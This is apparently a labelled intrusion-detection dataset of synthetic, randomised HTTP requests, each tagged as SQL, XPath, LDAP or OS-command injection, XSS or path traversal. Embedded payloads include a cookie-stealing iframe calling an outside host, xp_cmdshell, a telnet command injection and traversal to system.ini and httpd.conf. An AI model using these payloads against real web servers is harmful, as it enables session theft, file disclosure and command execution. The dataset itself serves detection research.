Start - Id: 49280
class: XPathInjection
GET /tNeSQ/yUTs@group by@aXb_LrFK/LKZlaCD-L/JP118QAROlsz/jOki98Bsystem72O/rMIJ1So@FDPg.gif?ispyN=nlnull6htaccesli&AmlscriptkH=aat+bhEno&aotheo6nd0tae5m=509&tn5deu=mity4iaXc.u&snEionnE=tnoecN&sa=eaE%26s2hiEo&eNN=le+e2%5DoesmeaRg3&5air9ssouajni=0057&i9llfso=meorat%27++or++++mtw%2FrmEa%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D0%5D++++or+++%27asl7ottb%27++++%3D++++%27&ea=%7E+%2FzdidI&bs1xemmr8ntnmea=anadSne&CtDHd_Rgl=irR&CrOecrrf=eIjc&siina=%3Eb%3CAi&qoerfLar=330369806 HTTP/1.1
Host: 178.124.57.39:80
Connection: close
Accept: text/*;q=0.5, image/png, application/postscript;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.9, deflate
Accept-Language: e-eh;q=0.0
Cache-Control: nju=qmx
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Sun, 13 Aug 06 12:57:31 CET
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Apr 04 05:30:26 UTC
If-Unmodified-Since: Thu, 10 Feb 05 16:45:27 UTC
If-Match: "Oq2syz7Gl3Ss1.1dfLqH"
If-None-Match: "wHnvcYP2A52kht@BYD4P"
If-Range: *
Max-Forwards: 168
MIME-Version: 9.5
Pragma: 8Te='qztKrwi'
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM b29IZXNhZWROemV5ZW50ZTI3c2lhZXRhamVvdGxjZTMzaWJlRXkzdG5tT3E=
Range: 305761-528973
Referer: /iqOntu/hol1oreO/shoansw.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 8.1; ot-o1; rv:7.0.5) Gecko/27613986
UA-CPU: x86
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49280
Start - Id: 40975
class: SqlInjection
GET /oDhfgfljHI_7O.e/rLMjIL5lJ0N_3vLEuE.jpeg? HTTP/1.0
Host: www.rexit9emel.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.5, x-mac-greek;q=0.8, windows-1257;q=0.6
Accept-Encoding: exec xp_cmdshell     '"loagf9Rgkm"  >>   script.vbs'
Accept-Language: emenSf-Lbootare;q=0.9, ns-hebknn;q=0.9, z-e;q=0.5, s-6nlh, uoglkq-Dekhktdc;q=0.8
Cookie: ddt=04239;ife=38;shw=63;afgStLstsGs=89624
Cookie2: $Version="886"
Date: Fri, 29 Aug 08 10:53:15 CET
Expect: jcnei8e
If-Modified-Since: Fri, 19 Jun 09 04:21:41 CET
If-Unmodified-Since: Wed, 09 Aug 06 17:28:24 UTC
If-Match: "ZR1-D-VHR8iHnthwIb"
If-None-Match: *
Max-Forwards: 004
Pragma: dgr=LylNnao7
Referer: /haxItc/4aesn/sAdcas/gpssarc/tiUsNia.css
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 8.0; ro-aH; rv:2.0.6) Gecko/17885070
Via: 7.6 46.187.182.182:578, 7.0 www.noD7nz.tiff
Warning: 206 www.exahet.tiff "tnnU5ihiheein" 
----: -------------------------------

null

End - Id: 40975
Start - Id: 44674
class: PathTransversal
GET /dNv/nSgKXVQfEUA6Xg/hD1yUsKTB4S/icxWbjAV6ZboyW/PKuR_Hh6BU/bgTsagasomiootjruycs/tV4TLt/o4iYeegngdigSmiei96g/epeLPNxJ6slHGrmk1Z0.jpeg?agho5=si8lle&5rIheet=ctT&eywe6=melobjectSbtbn2&hegBhtpass6Iwinnt@Ah=rhdnov&@2ekPtelnet%u7=oZS.rzo&hahOmwKCrpmh=ehfyOm&ad=703687371&gmYa=msrn3&Hbit=rSorhmln2Nedtcqh&Mroaei=dE&ftsifuaawhnmHu=eeg3C&9zmny=ocjlBXdY&a8nNeeltcerGjrl=518533&toWeqmeeaQ=nE&yzr9=hpgy7tmh8t HTTP/1.1
Host: www.eapnse.biz:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: esAuax-cs;q=0.0, tfoi-qy;q=0.5, Ti-ree;q=0.2
Cache-Control: max-stale
Client-ip: 112.69.124.168
Cookie: fiprtanttmaihe=460960;Ca7fue6YOa=collection(    file:///c:/lpah/hoa7sa.xml     );rqggmy=e3As;iHCyQ=vw%F mq[vrpeote aaei;7jBUiZq0422=s
Date: Thu, 18 Jan 07 05:18:45 CET
Expect: y6eg=Tqcft
If-Match: "U3kFvtsZ4CuV@zzfQOE2"
If-None-Match: *
Max-Forwards: 1
Referer: http://nealrcE.it/2pfbra6/Kc6ii/nLfneo/ayea.rar
User-Agent: kA1hyZPKmP http://www.td5caoi.net
Upgrade: trxtv/3.0

null

End - Id: 44674
Start - Id: 47877
class: XSS
GET /iuee2pmoptddiagro.shtml?it=%7Cpeaisn%25h3&tsgmae=e7l-VPEcuJ1&imdear=69553226&Apasswdj.=erd0UxmbAcd&JpARRFCf03=91&QlieosideWsnBl=5&childcQ4=%3Ciframe+++++src%3D+%22+vbscript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.asnsil.com%2Fcgi-bin%2Fndre.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&otfd5Radi=AoNl4ou HTTP/1.0
Host: www.y0yyqi.de:75254
Connection: close
Accept: application/postscript
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ber-i;q=0.2, cLcebate-os;q=0.2, i-Hlee;q=0.1
Cache-Control: no-cache
Client-ip: 85.234.191.196
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="24"
Date: Tue, 15 Nov 05 18:41:46 CET
ETag: "Nk4jHWlZF1_6AXNPTX"
Expect: lrhe
From: loGrTtE@euoweraEr.be
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: "IIk9yDYY5frPE4KdrK"
If-None-Match: *
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 8
MIME-Version: 0.4
Pragma: yraeie=ctethtA
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Digest nonce
Range: 064-,-6198,422476-
Referer: http://www.oqOt.org/0ktIsyTn/lqicif.gif
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 5.9; hd-ws; rv:7.3.1) Gecko/86295825
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: compress
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47877
Start - Id: 38891
class: LdapInjection
GET /peiget/qsD/nayliuTiaa/OehODrbA3tBireos/1iloC3eiooeedii/cmxcudlofiorzerp.exe?ak=0681015&jBinsertv4ilb=dHCib&nehatde=455&BYBpo-QESk=roi6e%24rrt0vbscriptoM4+&n0srttos6a3i8mf=yc6oaoqeltqsohimes&3lioeRo=mxh&iyit2nhs=9VjAROJ&kQ0NSKxlho=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Iipah=s4q&l0l=h8wpbnu HTTP/1.1
Host: www.ktWnr9es.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 191.208.34.138
Cookie: qpbhseaeir=sl3ryeioAsdehc2n;lRpib=E2ghomeei1t0datYNt;t38hnrlvm=aU7;r0yr0ht=tno;n2lrhlt3chajrha=nvDLVPMdz
Cookie2: $Version="1"
Date: Wed, 25 Oct 06 08:13:07 UTC
ETag: W/"KhEyuFQNtUVC@iUu7"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 24 Jun 09 05:00:45 CET
If-Unmodified-Since: Sat, 09 Oct 04 11:06:22 GMT
If-Match: *
If-None-Match: "ryVf8n9p4suiwzd5G"
If-Range: Sat, 19 Apr 08 11:56:07 GMT
Max-Forwards: 3
MIME-Version: 0.3
Pragma: yicbeptm='wt'
Proxy-Authorization: NTLM dGlkZW5hZWV1dHRvZnNubWVpb2Jsb3FmWHRlYWxsZXRmZGU4
Authorization: Digest cnonce="etussser"
Range: 15934-,799-8058,-81465
Referer: /h5nl4/ebxu.bin
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: ts0c8/1.8
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 3.7 212.12.149.213, bnne/4.9 www.rrth.shtml, 0.9 www.yItriu.js
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 822 www.hOrItr7c.jpg:50734 "1jmea2e2uepaea" "Mon, 20 Jun 05 14:05:30 GMT"
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38891
Start - Id: 45964
class: PathTransversal
GET /iow4saHkemzWloLuI6h/meOrihe7bLloee/s_6hp4Cvm1WVv5BFislp/y9at/anqoSb3XZWTTuODeW/lGG5XC-5EQ9EdES-uhX/QOO5hhRrKch76/bwOhtacces/ny3y3NKysq/efuens.swf?d3ecRfoinop=cacaen&wfnkhr=l&shA=hfV7X_tubQw&nlpahhA7ndaurat=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&_t3Wi=868623&Resa=4&CxmlperlGJ=3286661&ad=i+a&kr4=836&lmsarvri2=eiht&rR0iksv4ie=ASewid HTTP/1.0
Host: 149.215.176.191:8
Connection: A6sem
Accept: text/html
Accept-Charset: x-mac-chinesesimp;q=0.6, euc-kr;q=0.7, cp-932;q=0.9, shift_jis, euc-cn
Accept-Encoding: 
Accept-Language: cercaztt-ee0s42E;q=0.6
Cache-Control: wnTH='mis'
Client-ip: 84.6.25.215
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="06"
Date: Wed, 18 Jun 08 06:20:58 GMT
ETag: W/"Tw.50e1c0c9D2NOl@2Y"
If-Modified-Since: Tue, 08 Sep 09 20:30:02 CET
If-Unmodified-Since: Sat, 03 Apr 10 09:22:26 UTC
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-None-Match: "Rl8DL2b6u4C3pnSOj"
If-Range: Wed, 27 May 09 19:42:47 GMT
Max-Forwards: 0441
Pragma: no-cache
Authorization: egeteo TokaeEce=c8yd
Referer: http://www.lbtiserc.com/htoeesls/nsod2/TbdlyET.jpeg
User-Agent: Mozilla/4.8 (X11; U; SunOS sun4u 9.2; iw-ht; rv:3.7.0) Gecko/25154341
UA-Pixels: 297x264
Via: HTTP/2.9 190.196.108.169, 1.4 189.254.47.60, HTTP/9.5 43.240.173.254
Upgrade: gOraok/6.8, woRu/7.2, saOiE/3.6, nltr/3.7
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45964
Start - Id: 47805
class: XSS
GET /M3Ca/EDlink0/epsorelr/pZQpJ7rsbD.shtml?G2atexec3rtechoEEX=%3Cdiv+style+++%3D+++%22++width%3A++expression%28%5Balert+%28%27htje%27%29%3B%5D%29%3B++%22%3E&jsfg9t=0128&QYsamWFlogWpLq=97722392&9pap=skfgaVDoJ3pt&dboMcc=42&0whtpassn5fF%uwpV=ecF&580apbetweenYBGX=%3Fuj5sptoLk6ra&aE33raifdlolbot=i5q70-JZD8VT&a2h2Ri6ujitarsa=+sioasN3d9Eu-vI&sn=8&sishbi8e8=p&emit=xToeqs6elwleeUaRl0&U1R@inputWUftpEXV=165043 HTTP/1.1
Host: www.ue0syk.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.2, euc-cn;q=0.2, iso-2022-kr, x-mac-cyrillic;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 52.228.63.189
Cookie: bioe0stk=6148;sed4aefS8=fC7LlV@58;5kse=hr2ec17Uk5d4;5dn9ntIitrsoe=c
Cookie2: $Version="20"
Date: Sun, 21 Jun 09 14:23:15 CET
ETag: W/"zby_7s_k0d7Q5VhG"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Wed, 30 Jun 04 11:35:04 GMT
If-Unmodified-Since: Tue, 26 Sep 06 06:50:13 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Oct 06 05:04:31 CET
Max-Forwards: 101
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest nonce
Range: 944229-6,250-
Referer: http://te6leaoa.com/eooo/wenrs/HplIxnu/lzdI/hlce.htm
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (compatible; Konqueror/9.6; Win 9x; oeoeg; maeetim)
UA-CPU: 68000
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5941x524
Via: HTTP/5.1 www.oeaali.html, oaea/3.6 www.besmaat.png
Transfer-Encoding: compress
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47805
Start - Id: 48155
class: XSS
GET /IeedC2/fpa4O0lVGkd7/1ie9oam5sswoebtfIe/Cform8styleTO3wget2Lhv.bin?INGveN1=wmNsz&2hlg5stgdpn5lh=Runion&tfnDiLFform=h4s&sneyeGNrnpe7v=%3Cimg++src+%3D+%22+intoiclian+++%3E+++++%22++++onmouseover%3D%22+++++%5Balert++%28%27aa%27%29%3B%5D%22+%3E&afhScdo=57697&itdadbsdhet=httppi HTTP/1.1
Host: 130.215.71.74
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic;q=0.2
Accept-Encoding: compress, identity;q=0.9, identity
Accept-Language: met-pepedeoa;q=0.8, zeyoe-e, dstdsye-8, oi1usl-byemsn;q=0.1
Cache-Control: max-age=36
Client-ip: 211.190.214.99
Cookie2: $Version="4"
Date: Sun, 23 Dec 07 17:17:12 CET
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: ri3oektx@agekwucEtP.ch
If-Modified-Since: Wed, 20 May 09 13:59:29 UTC
If-Unmodified-Since: Mon, 04 Apr 05 15:57:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 8.3
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: /ahau5Ge/aHaSel/nsau.cgi
TE: trailers,gzip;q=0.3,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: oHYdgfIXk http://www.sirey.cz
UA-Disp: 187,5451,16
UA-Color: color8
Via: 5.2 53.22.102.41
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
X-Serial-Number: 41693947
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48155
Start - Id: 35564
class: XPathInjection
PUT /er3sqsnuiuSneuziglts/eQ/lc.cfm? HTTP/1.0
Content-Length: 334
Content-Language: seolihd,2
Content-Encoding: compress
Content-Location: /s16e/entd4t3A/w4es.rar
Content-MD5: MDh3c2dhbnVoZWhycHdnMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Sep 09 19:00:17 GMT
Last-Modified: Sun, 17 Apr 05 16:56:36 GMT
Host: 70.64.216.169:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1, gzip
Accept-Language: *;q=0.7
Cache-Control: min-fresh=02
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="43"
Date: Tue, 19 Apr 05 20:46:49 UTC
ETag: "r6vmUT6ot@i_hKSX-"
Expect: 100-continue
From: wp5sjfh@o8nst.uk
If-Modified-Since: Fri, 01 Aug 08 08:11:30 UTC
If-Unmodified-Since: Sat, 25 Apr 09 23:09:05 CET
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 35
MIME-Version: 5.3
Pragma: ghnAvt9=dren9
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: neesI esde=ephz
Range: -1,-1839
Referer: http://www.daSir2.biz/dtd3euS/sEedm/6tifdset.conf
TE: deflate;q=0.5,trailers,trailers
Trailer: Pragma
User-Agent: ldl2r/2.3
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 174x8533
Via: 6.0 www.zDnedde.htm
Transfer-Encoding: compress
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 111 66.147.23.225 "Ce1Nw" "Thu, 19 Mar 09 19:56:10 UTC"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6N9snhE=uamxl&tenrYai2=jta2pot&2el=siftrz' or   count(    path/child::node()[position( )=((  i +   j+ k  +   l+  1)]  |    path/child::*()[position()=(k+1)])=1 or 'Osnf' ='     ttO'  or&cibsi3iin=3926&r7qtprslazEss=9&hakltescvblut=a8QDM&tt8etyas3ic=motir

End - Id: 35564
Start - Id: 46160
class: PathTransversal
GET /agfldt5e/2faDrT/oooa8er5E/4MQR9b/cRp4KtAUA9HqcwlOq2jf/4Xlb4DgNpv.ONd5X.Wl.bin?zoHi5yihi=teerxet&uhnucra4a=oa%26hm&vsdv5ttoc=eoHBOWq1J&8U8vq49n=7f&Ibceen9nerlIBT=94135&LXTP1VsOiS=ts&connectVoT2X=ilL+t&i15rRei=nznlPey%28notmpj&ukGhetlYrrd=%2Fetc%2Fhttpd%2Fhttpd.conf&JmwNbgsoundbG=2523 HTTP/1.1
Host: 231.180.249.160:5
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, euc-tw, macintosh
Accept-Encoding: 
Accept-Language: mNore-nh3ej;q=0.6, EoehOc-jN, rusi-r, Lolo-r;q=0.9, helay-RetEtcgb
Cache-Control: no-transform
Client-ip: 172.17.95.67
Cookie: SBaoaram=238
Cookie2: $Version="276"
Date: Sun, 22 May 05 24:57:30 UTC
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: ehreer@1nwhcp.uk
If-Modified-Since: Sat, 10 Jan 04 19:53:48 CET
If-Unmodified-Since: Tue, 20 Nov 07 19:50:08 GMT
If-Match: "92p73qBn-vBrlb_-ZY"
If-None-Match: *
If-Range: "etyjRyxCxzZXImVI"
Max-Forwards: 7602
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic ZHNobTpnZVRzb3p2dA==
Authorization: Digest opaque="entieri"
Range: 6-,3215-
Referer: /n2hsgee/rfrzhmti/etsr5s/nnut4wfq.htm
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: nfHett/5.0.3
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: 1.8 www.nm35e1it.jpg, cltxet/4.5 144.206.115.146
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46160
Start - Id: 48847
class: XPathInjection
GET /htovelrei6h/uiaTRRbjspiy6CpostNc/Saerx/p83VV/aoAsvetpiuk1pkee4/l68Jbyu-/tTuNN5FKgF5KOI4.php3?icsnosenhEr=tu%2FebsE%2Fmlsd0e%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D75%5D+++%7C++lrt3aa%2Fa%2F9dx%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D04%5D+++++or++++%27eg%27%3D++%27 HTTP/1.1
Host: www.cj9a.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.7, euc-kr, macintosh;q=0.2, iso-8859-1;q=0.8
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 45.241.92.24
Cookie: amR=2402570;ao9honXj=dRtceD0uctsaa;7aamqneeu=1oa;elplrte6=383589
Cookie2: $Version="209"
Date: Fri, 09 Dec 05 01:02:54 CET
ETag: W/".PNa1BMBgDXCsul"
Expect: mOul=adnoax
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 15 Nov 05 08:11:53 UTC
If-Unmodified-Since: Mon, 23 Jun 08 23:48:53 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 893
MIME-Version: 7.4
Pragma: atiEiee='eott3i'
Proxy-Authorization: Digest nc=412BEE2D
Authorization: reon rlIlosml=A5EncsTa
Range: 5-03627
Referer: /sehce/keHgo/AiOFr/xeoNj.mpg
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/3.1 (X11; U; Linux i586 0.9; db-Rr; rv:4.6.1) Gecko/79168392
UA-CPU: StrongARM
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: 6.7 11.197.32.117
Transfer-Encoding: tEeso8
Upgrade: qdiue/5.0
Warning: 943 www.lz4g.png "ctOiblg" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48847
Start - Id: 43305
class: OsCommanding
GET /t2Zi@Vl3jeN4C/leglrh/os7noA.js?Xe=0729793793&xqcuev=198343337&Hs8Lcp=dN&Xl3XCYnph-Ghtacces=935&MsgLO-uVK9=5032822&n62drnoocEt=se4geteIle&DCCXfcbinb=htwcsbwttJGouwp&fxoh7xhxg=ce1Vmp&donsicodn=hl4r7&eop=nne5mP&ose4nohjeo=%22+++%3B++telnet++214.194.26.123++80++++%3B&Mc57OBDQrIgZ=00&d7etetao=Eet&Adeow0odhefMass=30800111 HTTP/1.1
Host: www.hscq.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2s09lOx-faehN;q=0.6, lsit-srb, esu-bs1iodhT, McEav-iIttIaa;q=0.3
Cache-Control: min-fresh=4066
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="21"
Date: Sun, 30 Jul 06 23:08:33 CET
ETag: "R9o82xN8kyAh79Fd2g"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 25 Jan 07 20:34:29 UTC
If-Unmodified-Since: Wed, 21 Jan 09 12:00:09 GMT
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Basic c2l0RWE2YTU6ZlR0d2Vz
Range: 398265-
Referer: http://4ittgr.be/yeaunp1/luAerTf/eelthgx/sAzi/ie3cn.tar
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: e2RL3Zx8 http://www.Pgez.st
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 3.4 16.51.69.58, FTP/7.7 www.oeriltx.htm
Transfer-Encoding: compress
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43305
Start - Id: 46558
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 31.90.188.103
Connection: bd3q
Accept: text/*, text/html, audio/x-wav;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 242.255.226.68
Cookie: pam7GO=smhhderynb7n;@linknaZE7O_=iacdjrtoThsbsg;AsesoL=186443;n2atdhadaet=usef%bryNCe-;uahEa=36459005;caeeV6mna9lei=rzelego'7<z
Cookie2: $Version="6"
Date: Fri, 26 Jan 07 10:18:14 CET
ETag: "HJpPlI7f4Xw2nJvkB"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Wed, 14 Apr 04 05:16:37 GMT
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "pbwxNHHuagfK5n.X"
If-Range: Sun, 17 Jan 10 19:10:09 UTC
Max-Forwards: 43
MIME-Version: 4.8
Pragma: oiiOYMe=STne
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: -675973,735393-84650,-104881
Referer: http://www.wwfi.cz/trrice0.doc
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 9.2; ih-Rl; rv:4.3.7) Gecko/63779619
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/4.5 62.178.108.127:187, dm7uta/6.7 www.egish.js
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46558
Start - Id: 38208
class: LdapInjection
GET /tGsmLz@Qmr/allcu960rmX@n2dnetcat.php4?Clnl0s3=hyEtD9idofetug9as&eaiEvter=ffus%29%28%26%28objectClass+++%3D+9he*%29&3IR.23FfHN=aBteDYmYI&qIET=7390254878 HTTP/1.0
Host: www.adqmihtew.uk
Connection: pnrsa
Accept: video/mpeg;q=0.9
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 9.211.101.123
Cookie: qmdwkVN_bgsoundo=rh8tl5aloeDe
Cookie2: $Version="98"
Date: Sun, 17 Jul 05 01:32:49 CET
ETag: W/"3Y.V7xSdTXxLud-DJe4"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 14 Feb 09 13:01:18 UTC
If-Unmodified-Since: Fri, 02 Jul 04 23:40:55 UTC
If-Match: *
If-None-Match: *
If-Range: "RuRknExHSUWfriMnci-"
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Digest username="E4tpls9"
Range: 1527-875,9678-
Referer: /tnhws/egen/ir1t.swf
TE: trailers
Trailer: Warning
User-Agent: yl8hqshr (2jsT-BQIkm; gpzLlRu.)
UA-CPU: StrongARM
UA-Disp: 6450,8964,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 321x2267
Via: FTP/7.9 www.osnj7.png
Transfer-Encoding: deflate
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 799 www.ptdan.js "sttJl" "Thu, 26 Aug 04 17:54:20 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38208
Start - Id: 48345
class: XPathInjection
GET /onMeec/soer1or/pPq@ukzCaDFfi9c/ejvszCK/t.Oihp4GOmjl/eY/eamdtOe9qalwhtt/eNpasswdxExwEZTnCE/zspcehtt/pmwabm/senn.js? HTTP/1.0
Host: www.4hEadtdc.fr
Connection: keep-alive
Accept: */*
